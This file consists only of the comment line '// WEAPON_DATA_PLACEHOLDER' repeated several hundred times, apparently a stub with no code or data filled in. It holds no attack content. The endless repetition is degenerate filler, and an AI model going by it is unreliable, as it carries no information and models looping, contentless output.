// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER

// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
// WEAPON_DATA_PLACEHOLDER
